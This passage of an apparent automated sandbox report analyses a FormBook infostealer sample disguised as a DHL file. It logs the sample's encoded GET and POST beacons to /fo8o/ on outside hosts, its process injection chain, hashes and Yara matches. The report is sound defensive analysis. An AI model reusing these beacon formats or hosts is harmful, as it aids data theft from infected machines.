VP+K2/IwOhEvlyoIgIyNGb0whqhjDeOTaEXJBhlHkm0Yj/QkU2pCt2+M6VQZbaqGTZVZtW2Vxfea1e7rOEmm6W9YBDB4eNzgJyODVo31o39GOR9pYERPj2lU9+KQZYN/z3B9UKWVkNYMP65mslzl+IzchTJVhnfM5gRIQiAIx8v3ZDE1gAlKesA0ev8l+bFsiA1fwCJUSEcJsr [TRUNCATED]
Jan 6, 2025 14:35:26.039762020 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:25 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49995	195.110.124.133	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:27.885863066 CET	522	OUT	GET /fo8o/?XHI=wJbPZ8pHe&bp=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:35:28.571969986 CET	367	IN	HTTP/1.1 404 Not Found Date: Mon, 06 Jan 2025 13:35:28 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49996	217.196.55.202	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:50.003901005 CET	786	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 74 34 45 67 75 6d 30 31 36 50 44 43 47 38 4e 50 79 48 57 47 68 68 34 36 44 79 31 5a 4b 71 52 6a 37 71 63 30 57 30 3d Data Ascii: bp=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jut4Egum016PDCG8NPyHWGhh46Dy1ZKqRj7qc0W0=
Jan 6, 2025 14:35:50.590318918 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 06 Jan 2025 13:35:50 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49997	217.196.55.202	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:52.575771093 CET	806	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4a 54 36 41 61 44 63 39 33 35 35 59 36 73 71 42 6a 43 79 51 72 49 41 63 6b 58 5a 30 54 72 6a 6c 56 48 6b 36 30 65 Data Ascii: bp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhJT6AaDc9355Y6sqBjCyQrIAckXZ0TrjlVHk60e
Jan 6, 2025 14:35:53.133100033 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 06 Jan 2025 13:35:53 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49998	217.196.55.202	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:55.102550983 CET	1823	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 62 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 61 6e 4e 6e 38 58 44 6b 54 76 7a 64 2f 49 65 32 6e 42 36 74 7a 51 4c 57 4b 61 6b 72 64 47 47 34 78 55 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 4a 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 38 37 [TRUNCATED] Data Ascii: bp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWanNn8XDkTvzd/Ie2nB6tzQLWKakrdGG4xUscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fJ/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZzjLiViX0Lp0PW7XSxY1U4YA0Z66PFyBxtpQZSgNQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9tmqAVpMvkSRvUArVW2NVpnzKjcgTxL/DBRlNImMIR+PT5MHwmfjWkAmxFlylFlMITMd+IC5dMlVPpWwjCXq6MxTzordJMtM1S1atxylHNpC89wJPHHxA9/jk7BKjsoqhGy4hKY8gkVPa1Ry5hCKTNTo+Xfaggk4FqKXyjMXh4fZVmCfquVLKjKRiBHwaZOxv0pDRDEf5j4BsSFLNuegAfHZvNRJYWtd1iAQps3/1f3xqnul7yzHiVU2nJS13+cGfoe2A2H00Sip0z1K9LdNlXmYO1jJU4ywKdoo11/tgbCyh0BgPpMSRuNM7E6Rpt7UFs3/HUWJmJod0nnNHkIzP/Fo89HepAVZoKf5aICTQVNh3QuDpSObeygXbf8T7f0Ps3ZoPHkkJHq+hqVH73iQJi2v5PaVm9Ke5X+glmDm7rRrGUx5VUCzLfT2bPu0IOI3LPFquQrbyY2ceLAvqUtFB3s8dGp47rYLDA6r+vaPyeS3NN26l72FAcAKCO8B08iGExuVedxcwb2Yw9L7UQv [TRUNCATED]
Jan 6, 2025 14:35:55.667248011 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 06 Jan 2025 13:35:55 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49999	217.196.55.202	80	2948	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 14:35:57.649365902 CET	518	OUT	GET /fo8o/?bp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&XHI=wJbPZ8pHe HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 6, 2025 14:35:58.216598988 CET	1235	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Mon, 06 Jan 2025 13:35:58 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?bp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&XHI=wJbPZ8pHe platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	08:32:15
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\DHL 8350232025-1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 8350232025-1.exe"
Imagebase:	0x1a0000
File size:	1'563'648 bytes
MD5 hash:	AC2D6BAF219BE307BCE9BC93F3BD4F3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:32:16
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL 8350232025-1.exe"
Imagebase:	0xc60000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1603244254.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1602875131.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1603846047.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:32:24
Start date:	06/01/2025
Path:	C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nWwCOpIDxawXeiAgMGKqBxiYnKCQTdGWpySGFeZnGTCPUnEYXVYCoTGboUGhvOpdkSP\EBeVwyXzNOzYtNUOvQ.exe"
Imagebase:	0x320000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3913125280.0000000003930000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	08:32:26
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x440000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3911918141.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3911851240.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3911205481.0000000002540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 